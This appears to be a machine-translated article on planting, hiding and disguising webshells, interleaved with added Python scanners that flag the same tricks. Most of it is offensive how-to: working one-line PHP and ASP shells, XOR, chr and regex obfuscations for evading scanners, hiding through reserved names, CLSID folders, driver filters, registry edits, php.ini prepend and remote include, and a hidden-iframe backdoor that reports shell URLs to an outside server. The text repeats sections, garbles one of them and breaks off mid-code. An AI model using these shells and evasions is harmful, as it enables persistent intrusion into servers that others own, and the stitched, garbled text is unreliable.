Every program in Windows has a CLSID. If you name a folder x.{program CLSID} and then enter two commands (shown only in the original screenshots), clicking the folder after creation opens the Control Panel, but it is in fact still a folder and the Da Ma still exists inside it. Naming a folder with the CLSID of a corresponding program in this way confuses administrators. For example, enter the Recycle Bin folder, create such a folder with the Recycle Bin's CLSID, and copy a reserved-name .asp file into it. You can also use
```
attrib +h +s +r +d /s /d
```
to modify the file's attributes and hide it. Windows does not display hidden files by default, and the Recycle Bin folder is created automatically, so an undeletable webshell can be hidden on the server.
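A scan that flags the two naming tricks just described (reserved device names such as aux.asp, and folders carrying a .{CLSID} suffix) in a list of web-root paths, as an added example that is not part of the original article. It also flags a colon in the final path component, the NTFS alternate-data-stream form the article mentions later for hiding a pony inside an image. The paths are constructed; the Recycle Bin CLSID used in the sample is the well-known one.

```python
# Added example (not part of the original article): flag web-root paths that use the
# Windows hiding tricks described above. The path list is constructed.
import re

# Names the article lists as reserved; Windows also reserves COM1-9 and LPT1-9.
RESERVED = {"aux", "prn", "con", "nul"} | {f"com{n}" for n in range(1, 10)} | {f"lpt{n}" for n in range(1, 10)}
# A trailing .{GUID} makes Explorer present the folder as the matching shell object.
CLSID_SUFFIX = re.compile(r"\.\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)

def split_components(path):
    """Split a Windows path on either separator and drop the drive letter."""
    parts = [p for p in re.split(r"[\\/]+", path) if p]
    if parts and re.fullmatch(r"[A-Za-z]:", parts[0]):
        parts = parts[1:]
    return parts

def classify(path):
    """Return the reasons a path looks like a hidden webshell; an empty list means clean."""
    reasons = []
    parts = split_components(path)
    for part in parts:
        stem = part.split(".")[0].lower()
        if stem in RESERVED:
            reasons.append(f"reserved device name '{part}' (cannot be deleted from Explorer)")
        if CLSID_SUFFIX.search(part):
            reasons.append(f"folder '{part}' masquerades as a system object through its CLSID")
    # A colon inside the final component is an NTFS alternate data stream (file.jpg:shell.asp).
    if parts and ":" in parts[-1]:
        reasons.append(f"alternate data stream in '{parts[-1]}'")
    return reasons

def scan(paths):
    """Map every suspicious path to its reasons."""
    flagged = {}
    for p in paths:
        reasons = classify(p)
        if reasons:
            flagged[p] = reasons
    return flagged

SAMPLE_PATHS = [  # constructed
    r"C:\inetpub\wwwroot\index.asp",
    r"C:\inetpub\wwwroot\aux.asp",
    r"C:\RECYCLER\hidden.{645FF040-5081-101B-9F08-00AA002F954E}\con.asp",
    r"C:\inetpub\wwwroot\images\logo.jpg:shell.asp",
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_PATHS).items():
        print(path)
        for r in reasons:
            print("   -", r)
```

Run it over a directory listing produced with dir /s /b (or a file-integrity export), since Explorer itself will not show the reserved-name file and will render the CLSID folder as the Recycle Bin.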
③ Driver hiding technology
The principle: in the Windows file system, when a folder is opened the system issues an IRP_MJ_DIRECTORY_CONTROL request. Its handler allocates a buffer, enumerates the entries under the folder and stores the results in that buffer. During enumeration it compares file names against a list; if a name matches, that folder or file is skipped. As for how the skip works, I read the code and my understanding is that when the target entry is reached, the file's offset is added to the traversal pointer and enumeration moves on without scanning the target. Although there is plenty of C source for this technique on the Internet, it is hard to use in practice because of header-file and OS support (file systems differ between Windows versions). I found the Easy File Locker program on the Internet; it has to be installed on the web server and used to set permissions on the target file.
[Screenshot not reproduced: Easy File Locker permission dialog]
Permission settings include readable, writable, deletable, and visible.
[Screenshot not reproduced: the file hidden from the directory listing]
The picture shows that the file is hidden. As mentioned above, because enumeration is bypassed directly, the file can still be reached by its absolute path. My understanding is that the four files
```
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
```
take over the enumeration query: accessing a hidden file by absolute path does not go through the normal absolute-path lookup but through these four files, which is equivalent to a separate driver for the hidden files.
So as not to be discovered by the administrator you can uninstall the Easy File Locker program, but you cannot delete these four files. After the program is removed, the file can still be accessed by entering its absolute path, which achieves a hidden backdoor.
④ Registry hiding
Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL. There is a CheckedValue key under this path; change it to 0. If there is no CheckedValue key, create one and set it to 0. The hidden files created earlier are then completely hidden: even if "Show all files" is turned on under Folder Options, they are not displayed.
(2) Hiding the one-line Trojan
① Hiding via include statements
Some script files on a website contain include statements. You can use this inclusion mechanism to include the one-line file; when the page is accessed the one-line Trojan is invoked directly. In ASP the include statement takes the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a one-line NTFS-stream pony into an image; after changing the '\' in the path to ':', the image will no longer display. Then find an ASP file on the web server and write an include statement at the beginning of it. The PHP include statement is:
```
<?php include($include); ?>
```
$include here can be an external path, for example:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
The content of 1.php on aaa is
```
<?php include($include); ?>
```
which performs the inclusion. bbb is an external server; the precondition is that bbb must not support PHP, otherwise hehe.php (the one-line Trojan) is executed on the bbb server and nothing runs on aaa.
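An audit of a php.ini text for the settings the inclusion tricks depend on, as an added example that is not part of the original article. The remote include in the aaa/bbb case above only works when allow_url_include is on (a real PHP directive), and the php.ini prepend trick the article describes in the next subsection rests on auto_prepend_file and an include_path containing '.'; the function flags all of them plus an empty disable_functions. The ini excerpt is constructed, reusing the hehe.php and include_path values from the article.

```python
# Added example (not part of the original article): audit a php.ini text for the
# settings that the include-based hiding methods rely on. The excerpt is constructed.
import re

# Constructed php.ini excerpt; hehe.php and the include_path mirror the article's example.
SAMPLE_INI = r"""
; constructed sample, not a real server's configuration
allow_url_fopen = On
allow_url_include = On
auto_prepend_file = hehe.php
auto_append_file =
include_path = "E:\PHPnow-1.5.6\htdocs;."
disable_functions =
"""

ON_VALUES = {"1", "on", "true", "yes"}

def parse_ini(text):
    """Minimal key=value parser: skips ';' comment lines and strips surrounding quotes."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"').strip("'")
    return settings

def audit_php_ini(text):
    """Return findings for settings that enable remote include or silent prepend/append."""
    s = parse_ini(text)
    findings = []
    if s.get("allow_url_include", "").lower() in ON_VALUES:
        findings.append("allow_url_include=On: include($x) with a URL fetches and runs remote code")
    for key in ("auto_prepend_file", "auto_append_file"):
        if s.get(key):
            findings.append(f"{key}={s[key]}: this file is executed before/after every PHP script")
    # The article's Windows example separates include_path entries with ';'.
    dirs = [d for d in re.split(r"[;:]", s.get("include_path", "")) if d and not re.fullmatch(r"[A-Za-z]", d)]
    if "." in dirs:
        findings.append("include_path contains '.': the prepended file resolves relative to each script")
    if not s.get("disable_functions"):
        findings.append("disable_functions is empty: system(), exec() and similar remain callable")
    return findings

if __name__ == "__main__":
    for f in audit_php_ini(SAMPLE_INI):
        print("-", f)
```

Splitting include_path on both ';' and ':' keeps the check usable for Linux-style paths; a lone drive letter produced by splitting E:\... on ':' is discarded so it is not mistaken for a directory.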
②Configuration file hidden sentence (PHP)
After getting a PHP webshell you can use php.ini to hide the file by editing the configuration. One of its functions adds the contents of a given file to every page as a header or footer: auto_prepend_file = hehe.php. Then look at include_path = "E:\PHPnow-1.5.6\htdocs;.": this setting indicates where the header and footer files are looked up. The rule is "path1;path2", meaning the header and footer files in the path1 folder are added to the files in the path; since there is a '.' here indicating the root path, it is equivalent to adding them to the home page. Then write the one-line Trojan into hehe.php, and through PHP's prepend function it is written into the website's home page.
③ 404 pony
The 404 pony displays a "page does not exist" (404) page when accessed, but in fact the Trojan code has already executed. Generally it can be invoked by pressing Shift five times.
4. One-line webshell detection evasion
1. Construction method to bypass detection (PHP)
General detection programs filter strings such as "_POST", "system" and "call_user_func_array". In that case a construction method can bypass some detection programs. The basic principle is that every character in PHP corresponds to a binary value, so with the XOR method a character in the Trojan can be replaced by the XOR of two other characters. For example, the code
```
@$_++;            // ++ turns the undefined $_ into 1
$__=("#"^"|");    // "_"
$__.=("."^"~");   // "P"
$__.=("/"^"`");   // "O"
$__.=("|"^"/");   // "S"
$__.=("{"^"/");   // "T"
```
Then the constructed one-liner can be written as
```
<?php
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // the value of $__ is _POST
@${$__}[!$_](${$__}[$_]);                                // i.e. @$_POST[0]($_POST[1])
?>
```
The result is @$_POST[0]($_POST[1]): !$_ is the negation of 1, and in the language 1 is true, so its negation is 0 (false). But this bypass is quite weak. If you think about it, even though each character is built from the binary values of two characters, the expression
```
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/")
```
is itself detected on a second pass: the value of the hex-encoded code will still be flagged.
2. Regular expression replacement method (PHP)
PHP has a function preg_replace() that performs regular-expression replacement. Using replacement to bypass detection also relies on a feature of the PHP language: when the function is called, if the value bound to its formal parameter contains a command, that command is executed.
```
<?php
function funfunc($str){
}
echo preg_replace("/(.+?)/ies", 'funfunc("\\1")', $_POST["cmd"]);
?>
```
The code above is a replacement process. First an empty function is created; then preg_replace replaces the HTML element contents matched by (.+?) in the cmd form field with a call to funfunc. If the value in the POST form is
```
{${phpinfo()}}
```
(phpinfo() can of course be replaced with other commands), the replacement turns it into funfunc({${phpinfo()}}); since ${} evaluates the content inside {}, phpinfo is executed.
3. Instant generation method (PHP)
When header-file inclusion is used, the included PHP header file is easily found by scanners. In that case file_put_contents can be used to create a file with the one-line PHP Trojan written into it, generating the Trojan just before accessing it. However, this function is itself sensitive and easily flagged.
4. Avoidance method (ASP)
Because some ASP servers filter in order to block one-line Trojans, you can use:
```
<script language=VBScript runat=server> execute request("cmd") </script>
```
The function is the same; only the form changes. Avoidance with a specific scripting language: the ASPX one-liner
```
<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); </script>
```
Here the one-line Trojan is written in C#.
5. Split method (ASP)
Split the one-liner into parts. Although the chance of bypassing is small, it is still a bypass technique: some servers may have many sophisticated scanning methods yet miss small things. There is also an enhanced split version:
```
<% If Request("MH")<>"" Then Execute(Request("MH")) %>
<% if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH") %>
```
The two lines above use an if statement to separate the pieces. The central idea is to split the sensitive characters: the usual ASP signatures are eval(request or execute(request, and once they are split the signature is not detected and the check is bypassed directly.
6. Garbled-text transformation (ANSI->Unicode encryption)
```
<%eval request("#")%>
```
transforms into “┼攠數畣整爠煥敵瑳∨∣┩愾”.
```
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
```
The line above uses ASCII encoding: chr(114) is the character numbered 114 in ASCII, i.e. r. After conversion the code becomes
```
<%eval(eval(request)("brute"))%>
```
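A static scanner for the evasions listed in this section, as an added example that is not part of the original article: it evaluates PHP ("a"^"b") XOR chains and VBScript chr(n)+chr(m) chains back to the token they spell (so the "_POST" and "request" constructions above are caught by the token they produce, not by the scanner's word list), and it flags preg_replace with the /e modifier, ${$var}[...] on a superglobal, split eval/execute request calls, and the gzinflate/base64_decode/str_rot13/strrev wrappers the next subsection on Da Ma evasion describes. The indicator labels are this example's own; the sample sources are constructed from the constructions shown on this page.

```python
# Added example (not part of the original article): static indicator scan for the
# one-line webshell evasions discussed in this section. Sample sources are constructed.
import re

# ("a"^"b").("c"^"d")... chains: PHP string XOR used to spell a forbidden token.
XOR_PAIR = re.compile(r'"([^"\\])"\s*\^\s*"([^"\\])"')
XOR_CHAIN = re.compile(
    r'\(\s*"[^"\\]"\s*\^\s*"[^"\\]"\s*\)(?:\s*\.\s*\(\s*"[^"\\]"\s*\^\s*"[^"\\]"\s*\))*')
# chr(n)+chr(m)... chains: VBScript ASCII spelling of a token such as "request".
CHR_ONE = re.compile(r"chr\(\s*(\d+)\s*\)", re.I)
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*[+&]\s*chr\(\s*\d+\s*\))*", re.I)

# Tokens that legitimate code has no reason to assemble at run time.
SENSITIVE = {"_post", "_get", "_request", "_cookie", "request", "eval", "execute",
             "system", "assert", "call_user_func_array"}

# Plain-text indicators; the labels are this example's own.
INDICATORS = [
    ("eval-request (ASP)",
     re.compile(r"\b(eval|execute)\s*\(?\s*(request|session)\b", re.I)),
    ("preg_replace /e",
     re.compile(r"""preg_replace\s*\(\s*(["'])/.*?/[a-zA-Z]*e[a-zA-Z]*\1""")),
    ("variable-variable on superglobal", re.compile(r"\$\{\s*\$\w+\s*\}\s*\[")),
    ("nested decode/eval wrapper",
     re.compile(r"\b(eval|assert)\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13|strrev)\s*\(", re.I)),
    ("encoding helpers",
     re.compile(r"\b(gzinflate|base64_decode|str_rot13|strrev)\s*\(", re.I)),
]

def resolve_xor_chains(src):
    """Evaluate every XOR chain in src to the string it builds (e.g. '_POST')."""
    return ["".join(chr(ord(a) ^ ord(b)) for a, b in XOR_PAIR.findall(m.group(0)))
            for m in XOR_CHAIN.finditer(src)]

def resolve_chr_chains(src):
    """Evaluate every chr(n)+chr(m)... chain in src to the string it builds."""
    return ["".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0)))
            for m in CHR_CHAIN.finditer(src)]

def scan_source(src):
    """Return the sorted indicator labels found in src after de-obfuscation."""
    hits = {name for name, rx in INDICATORS if rx.search(src)}
    for token in resolve_xor_chains(src) + resolve_chr_chains(src):
        if token.lower() in SENSITIVE:
            hits.add(f"obfuscated token '{token}'")
    return sorted(hits)

def scan_all(sources):
    """Map each file name to its indicator list."""
    return {name: scan_source(src) for name, src in sources.items()}

SAMPLES = {  # constructed, mirroring the constructions shown on the page
    "xor.php": '<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]); ?>',
    "regex.php": '<?php function funfunc($str){} echo preg_replace("/(.+?)/ies", \'funfunc("\\\\1")\', $_POST["cmd"]); ?>',
    "wrapped.php": '<?php @eval(gzinflate(base64_decode($code))); ?>',
    "split.asp": '<% if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH") %>',
    "chr.asp": '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>',
    "clean.php": '<?php echo htmlspecialchars($_GET["q"] ?? ""); ?>',
}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(f"{name:12s} {hits or 'clean'}")
```

The point the article makes about the XOR method being weak is visible here: the scanner never needs "_POST" on its word list, because the chain itself is the signature and its value can be computed offline.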
7. Da Ma detection evasion
(1) base64 encoding
A Da Ma can be protected from detection by compressing the Da Ma code, base64-encoding the compressed result, and then appending to the end of the Da Ma code
```
<?php @eval(gzinflate(base64_decode($code))); ?>
```
which executes the script. The $code variable holds the base64 text; at run time it is first base64-decoded and decompressed by gzinflate, then executed by eval. In fact this cannot truly evade detection: base64_decode and eval are still on the signature list and are flagged when the file passes through a scanner.
(2) ROT13 encoding (PHP)
str_rot13 is a PHP encoding function. It can be used to encode script code to bypass signature detection, for example:
[Screenshot not reproduced: str_rot13/strrev-wrapped loader]
The strrev function in the picture reverses a string. To escape signature detection, the characters are deliberately separated with '.' signs. The three strings encoded with str_rot13 in the picture are gzinflate, str_rot13 and base64_decode, in that order, which amounts to triple encoding and also avoids the two signatures gzinflate and base64_decode. But str_rot13 itself is not avoided, and some anti-virus software may use str_rot13 as a signature as well. ROT13 means rotation by 13: each character is encoded by shifting its position in the alphabet by 13. Apply it twice and the original value returns. Because the algorithm is fixed, its strength is low, and cracking it is trivial: just apply it once more.
(3) Other encodings
Anti-virus software and scanners generally use signatures to decide whether something is malicious. When making a Da Ma, a pony or a one-liner evade detection, the PHP or ASP encoding functions (base64, rot13 and so on) are usually used to bypass scanners, but I think you can write your own encoding algorithm and use it to encode the script code to bypass some signatures. You can borrow ideas from ciphers such as the Caesar cipher and shift ciphers, write an algorithm and encode the script code with it; signatures such as base64 and rot13 then disappear. Alternatively, use the home-made algorithm to encode only the signature strings and decode them when they are used. You can also use keyed algorithms such as DES and RSA. A Da Ma generally has a password login box; tie the login password to the decryption key so that the code can only be decoded after the correct password is entered. On one hand this avoids detection by scanners and anti-virus software; on the other it is convenient, since even if someone else obtains the Da Ma they cannot decrypt it and see the source code.
5. About webshell backdoors
Da Ma downloaded from the Internet generally contain backdoors of some kind. These backdoors directly lead to the website we obtained being taken over by someone else, so a downloaded Da Ma must first be checked for backdoors. For example, the universal password here:
```
end function
if session("hehe")<>"" then
if request.form("pass")=userpass or request.form("pass")="1111111" then
session("hehe")=UserPass
response.redirect url
else
```
Here
```
request.form("pass")=userpass
```
was originally used to verify the value of pass: if the entered pass equals userpass, verification succeeds. But the later
```
or request.form("pass")="1111111"
```
means that if the entered pass is 1111111 you can also log in to the Da Ma. Of course, it is not always this simple. The original author may assign userpass two values and add a trigger condition that changes userpass when he logs in (for example, a failed login triggers an update of the userpass value), so that a suffix is appended; moreover, the trigger code and the verification code are far apart and hard to find. In that case the Da Ma code has to be analyzed line by line.
Then a frame is used to mount the Trojan:
```
<iframe src="backdoor address" width=0 height=0></iframe>
```
Here the width and height of the framed address are set to 0, so the page is hidden. The "backdoor address" points to your own receiving script, which you finally place on a public server you set up. The receiving script is as follows:
```
<%
url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
```
where
```
url=Request.ServerVariables("HTTP_Referer")
```
reads the Referer of the request, i.e. the URL of the Da Ma, and then saves that URL into hehe.txt in the current directory.
To remove this kind of backdoor, first disable the second password check in the Da Ma, the master password, by deleting the relevant code; then check whether the ASP Da Ma page contains a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation of webshells and an exploration of hiding them, covering these aspects. I hope it is helpful to friends interested in PHP tutorials.
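A source audit for the two backdoor patterns just described, as an added example that is not part of the original article: an alternate hard-coded password OR'ed into the login check, and a zero-size iframe whose src points off-host (the Referer leak to the receiving script). The ASP excerpt is constructed around the login fragment shown above; the host names and the userpass value in it are placeholders.

```python
# Added example (not part of the original article): audit a downloaded ASP shell's
# source for the universal-password and hidden-iframe backdoors described above.
import re
from urllib.parse import urlparse

# Constructed excerpt built around the article's login fragment; hosts are placeholders.
SAMPLE_ASP = '''<%
userpass = "s3cret"
if session("hehe")<>"" then
  if request.form("pass")=userpass or request.form("pass")="1111111" then
    session("hehe")=UserPass
    response.redirect url
  else
    response.write "login failed"
  end if
end if
%>
<iframe src="http://collector.example/recv.asp" width=0 height=0></iframe>
<iframe src="/help/manual.htm" width="600" height="400"></iframe>
'''

# 'or request.form("pass")="<literal>'': a second, hard-coded password in the check.
ALT_PASSWORD = re.compile(r'\bor\s+request\.form\(\s*"pass"\s*\)\s*=\s*"([^"]*)"', re.I)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r'(\w+)\s*=\s*"?([^"\s>]*)"?')

def find_alternate_passwords(src):
    """Return every literal accepted as an alternative to the real password."""
    return ALT_PASSWORD.findall(src)

def find_hidden_iframes(src, own_host="shell-host.example"):
    """Return src URLs of iframes that are zero-sized and point at another host."""
    hits = []
    for m in IFRAME.finditer(src):
        attrs = {k.lower(): v for k, v in ATTR.findall(m.group(1))}
        zero = attrs.get("width") in ("0", "0px") and attrs.get("height") in ("0", "0px")
        host = urlparse(attrs.get("src", "")).hostname
        if zero and host and host != own_host:
            hits.append(attrs["src"])
    return hits

def audit_shell_source(src):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    for pw in find_alternate_passwords(src):
        findings.append(f"universal password '{pw}' accepted in login check")
    for url in find_hidden_iframes(src):
        findings.append(f"hidden iframe leaks the Referer (this page's URL) to {url}")
    return findings

if __name__ == "__main__":
    for f in audit_shell_source(SAMPLE_ASP):
        print("-", f)
```

The article's caveat applies: a password that is rewritten by a trigger elsewhere in the file will not match the literal pattern, so a clean result from this check does not replace reading the authentication path line by line.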
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
3. The "security" of webshell
1. Regarding the hiding of webshell
(1) Hiding a large webshell (DaMa)
① "Undead" files built on reserved device names
Windows reserves a set of device names that the normal Win32 file APIs will not accept as file or folder names: CON, PRN, AUX, NUL, COM1 to COM9 and LPT1 to LPT9. The check looks only at the part of the name before the first dot, so aux.asp counts as the AUX device, and Explorer and ordinary tools can neither create nor delete it. The copy command can create it if the destination is written with the \\.\ device-namespace prefix, which skips the Win32 name checks:

    c:\>copy 3.asp \\.\C:\aux.asp

This creates aux.asp on the C drive. The file cannot be deleted from the graphical interface; to remove it you must use del with the same prefix:

    c:\>del \\.\C:\aux.asp

There is no prompt after deletion, but the file is indeed gone. Note that this only makes the file hard to delete, not hard to notice: a webshell named this way and dropped straight into the web root will still be removed by any experienced administrator who sees it.

② CLSID-named folders
Every COM object registered on Windows has a CLSID, and Explorer shows a folder named x.{CLSID} as the object that CLSID identifies rather than as a folder. Create such a folder (md x.{CLSID}) and copy the shell into it; clicking the entry afterwards opens, say, the Control Panel, but it is in fact still a folder, the shell inside it still exists and is still served. Naming the folder after a suitable object misleads the administrator: for example, create one inside the Recycle Bin directory using the Recycle Bin's own CLSID and copy a reserved-name file such as aux.asp into it. The attributes can then be changed to hide it:

    attrib +s +h +r x.{CLSID} /s /d

Windows does not show hidden or system files by default, and the Recycle Bin folder is created automatically, so an undeletable webshell can sit on the server without attracting attention. A plain dir /a from the command line still lists it, as does any listing that does not go through the Explorer shell.
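The Python script below is an added example, not part of the original page: it walks a directory listing and flags the name-based hiding tricks that can be spotted without touching the machine (reserved device names, CLSID-suffixed folders and NTFS alternate-data-stream references), and builds the \\.\ device path that del needs for a reserved-name file. SAMPLE_LISTING and every path in it are constructed; the CLSID in it is the Recycle Bin's.

```python
import re

# Added example (not from the page): spot Explorer-level hiding tricks in a listing.
RESERVED = {"con", "prn", "aux", "nul"} | {"com%d" % i for i in range(1, 10)} | {"lpt%d" % i for i in range(1, 10)}
CLSID_SUFFIX = re.compile(r"\.\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.I)

SAMPLE_LISTING = [  # constructed; directories end with a backslash
    "C:\\inetpub\\wwwroot\\index.asp",
    "C:\\inetpub\\wwwroot\\aux.asp",                               # reserved device name
    "C:\\inetpub\\wwwroot\\images\\logo.jpg:cmd.asp",              # NTFS alternate data stream
    "C:\\RECYCLER\\x.{645FF040-5081-101B-9F08-00AA002F954E}\\",   # folder shown as Recycle Bin
    "C:\\inetpub\\wwwroot\\com10.asp",                             # not reserved: only COM1..COM9
]


def basename(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1]


def is_reserved_name(name):
    # Windows decides by the part before the first dot, so aux.asp is the AUX device.
    return name.split(".")[0].lower() in RESERVED


def device_path(path):
    # The \\.\ prefix skips Win32 name normalisation; copy and del need it for aux.asp.
    return "\\\\.\\" + path


def audit_listing(listing):
    """Return (path, finding, hint) for every suspicious entry in the listing."""
    findings = []
    for path in listing:
        name = basename(path)
        if path.endswith("\\") and CLSID_SUFFIX.search(name):
            findings.append((path, "clsid_folder", 'dir /a "%s"' % path.rstrip("\\")))
        elif not path.endswith("\\") and is_reserved_name(name):
            findings.append((path, "reserved_device_name", "del " + device_path(path)))
        elif ":" in name:
            host_file = path.rsplit(":", 1)[0]
            findings.append((path, "ntfs_alternate_stream", 'dir /r "%s"' % host_file))
    return findings


if __name__ == "__main__":
    for path, finding, hint in audit_listing(SAMPLE_LISTING):
        print("%-24s %s\n    %s" % (finding, path, hint))
```

The hints are the commands a responder would run next: dir /a shows hidden and system entries regardless of Explorer settings, dir /r lists alternate streams, and del with the device prefix removes a reserved-name file that the GUI refuses to touch.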
③ Driver-level hiding
The principle: when a folder is opened, the file system receives an IRP_MJ_DIRECTORY_CONTROL request (minor function IRP_MN_QUERY_DIRECTORY) and fills a caller-supplied buffer with one directory-information record per entry, each record carrying a NextEntryOffset to the next one. A filter driver sitting above the file system looks at that buffer when the request completes and compares each file name with the names it wants hidden; on a match it skips the record by adding its NextEntryOffset to the previous record's offset, so whoever walks the list steps straight past it. The hidden entry is untouched on disk and still opens by its absolute path, because opening by name does not go through the directory listing at all.

Although plenty of C source for such filters exists online, it is awkward to build and run (header-file and kernel-version dependencies; the file system differs between Windows versions). A packaged alternative is the Easy File Locker program, which is installed on the web server and applied to the target file. Its permission settings cover readable, writable, deletable and visible; clearing "visible" hides the file from listings while, as explained above, the absolute path still opens it.

Easy File Locker leaves four files behind:

    C:\WINDOWS\xlkfs.dat
    C:\WINDOWS\xlkfs.dll
    C:\WINDOWS\xlkfs.ini
    C:\WINDOWS\system32\drivers\xlkfs.sys

These four replace the normal traversal: reaching a hidden file by absolute path is not an ordinary path lookup but goes through them, which amounts to a private driver for the hidden files. To avoid tipping off the administrator, the Easy File Locker application itself can be uninstalled, but the four files must stay; after removing the program the hidden webshell is still reachable by entering its absolute path, which is what makes this a hidden backdoor. Conversely, an xlkfs.sys in the drivers directory of a web server is exactly what an investigator should look for.

A related trick uses NTFS alternate data streams: a stream-writing tool puts the one-line shell into a stream of an image file, i.e. a path of the form image.jpg:shell.asp, so the image itself is unchanged and the stream does not show in a normal directory listing. An existing asp or php page on the server is then edited to include that stream path at the top of the file (php: include, asp: #include), with the path given as it is on the web server, so the shell runs whenever the page is requested. (dir /r lists streams on Windows Vista and later.)

④ Registry hiding
Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL. Under this key is a value named CheckedValue; set it to 0 (if it does not exist, create it as a DWORD and set it to 0). Explorer consults this value for the "Show hidden files and folders" option, so once it is 0 hidden files stay hidden even when that option is switched on in Folder Options. Files marked hidden then disappear completely from Explorer, though a dir /a at the command line is unaffected.

(2) Hiding one-line shells
① Hiding through include statements
Some of the script files on a site contain include statements, and the same mechanism can be used to pull in a one-line shell: whenever the page is requested, the included code runs as part of it. Consider a 1.php containing

    <?php include($include); ?>

Here $include can be an external path, for example:

    http://www.aaa.com/1.php?include=http://www.bbb.com/hehe.php

The 1.php on aaa holds only the include statement. bbb is an external server, and the precondition is that bbb must not execute PHP (or hehe.php must be served as plain text, for instance renamed hehe.txt); otherwise hehe.php, the one-line shell, is executed on bbb and only its output reaches aaa, so nothing runs there. Two further conditions apply on aaa: $include must actually be populated from the query string (register_globals, off by default since PHP 4.2, or an explicit $include = $_GET["include"]), and allow_url_include must be on, which has defaulted to Off since PHP 5.2; with it off, include() of an http:// URL fails with a warning.
② Hiding a one-line shell in a configuration file (PHP)
Once you have a PHP webshell, php.ini itself can be used to hide the shell. One of its features is to prepend or append the contents of a chosen file to every PHP page served, a header and a footer:

    auto_prepend_file = hehe.php
    auto_append_file =

Then look at

    include_path = ".;E:\PHPnow-1.5.6\htdocs"

This setting tells PHP where to look for a relative file name such as hehe.php. The rule is "path1;path2" (';' separates entries on Windows, ':' on Unix), searched in order, and the '.' entry means the directory PHP is running the script from, so a hehe.php placed next to the home page is found when the home page is requested. Write the one-line shell into hehe.php and PHP's prepend mechanism effectively inserts it at the top of every page on the site, the home page included, without touching any page's source. The same directives are also honoured from a .user.ini in the web directory under CGI/FastCGI and, with mod_php, from .htaccess via php_value, so an audit has to check those files as well as php.ini.
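As an added example that is not part of the page, the Python check below covers the configuration surfaces the trick above depends on: it parses a php.ini fragment and an .htaccess for auto_prepend_file / auto_append_file and allow_url_include, and lists the paths PHP will search for a relative file name according to include_path. The INI text, the .htaccess text and every path in them are constructed for this example.

```python
import re

# Added example (not from the page): audit PHP config for prepend/append and URL include.
SAMPLE_PHP_INI = """
; constructed php.ini fragment
include_path = ".;E:\\PHPnow-1.5.6\\htdocs"
auto_prepend_file = hehe.php
auto_append_file =
allow_url_include = On
"""

SAMPLE_HTACCESS = """
# constructed .htaccess; mod_php honours php_value lines in it
php_value auto_append_file /var/www/html/images/.cache.php
"""

TRUTHY = {"1", "on", "yes", "true"}


def parse_php_ini(text):
    """key = value pairs; ';' starts a comment unless it sits inside a quoted value."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in ";#[" or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        if value.startswith('"'):
            value = value[1:].split('"', 1)[0]
        else:
            value = value.split(";", 1)[0].strip()
        conf[key.lower()] = value
    return conf


def parse_htaccess(text):
    """php_value / php_admin_value directives override php.ini per directory."""
    conf = {}
    for m in re.finditer(r"^\s*php_(?:admin_)?value\s+(\S+)\s+(.+?)\s*$", text, re.M):
        conf[m.group(1).lower()] = m.group(2).strip('"')
    return conf


def resolve_candidates(name, include_path):
    """Where PHP will look for a relative auto_prepend/append file, in search order."""
    if re.match(r"(?:[A-Za-z]:)?[\\/]", name):
        return [name]  # absolute path: no include_path search
    sep = ";" if ";" in include_path or re.match(r"[A-Za-z]:", include_path) else ":"
    out = []
    for entry in filter(None, include_path.split(sep)):
        join = "\\" if "\\" in entry or re.match(r"[A-Za-z]:$", entry) else "/"
        out.append(entry.rstrip("\\/") + join + name)  # '.' is the script's directory
    return out


def audit_php_config(conf, source):
    """Return (source, directive, value, where-it-resolves) for each risky directive."""
    findings = []
    for key in ("auto_prepend_file", "auto_append_file"):
        if conf.get(key):
            findings.append((source, key, conf[key], resolve_candidates(conf[key], conf.get("include_path", "."))))
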